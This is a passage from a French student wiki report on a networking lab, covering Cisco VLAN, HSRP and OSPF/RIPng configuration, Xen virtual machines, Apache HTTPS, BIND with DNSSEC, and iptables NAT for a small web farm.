| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain se rapproche de la notion de domaine de diffusion voire VLAN avec des options plus poussés pour le filtrage et le forwarding [https://www.cisco.com/c/en/us/td/docs/routers/asr1000/configuration/guide/chassis/bdi.html  plus]. Pour permettre à notre routeur d'avoir une interface sur un bridge domaine on doit lui configurer une interface logique appelée BDI (Bridge Domain Interface) .Un routeur peut avoir plusieurs Bridge Domaines mais un Bridge Domaine n'accepte qu'une seule BDI. &lt;br /&gt;
&lt;br /&gt;
On en profite aussi pour faire notre configuration HSRP (Hot standby router protocol) [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
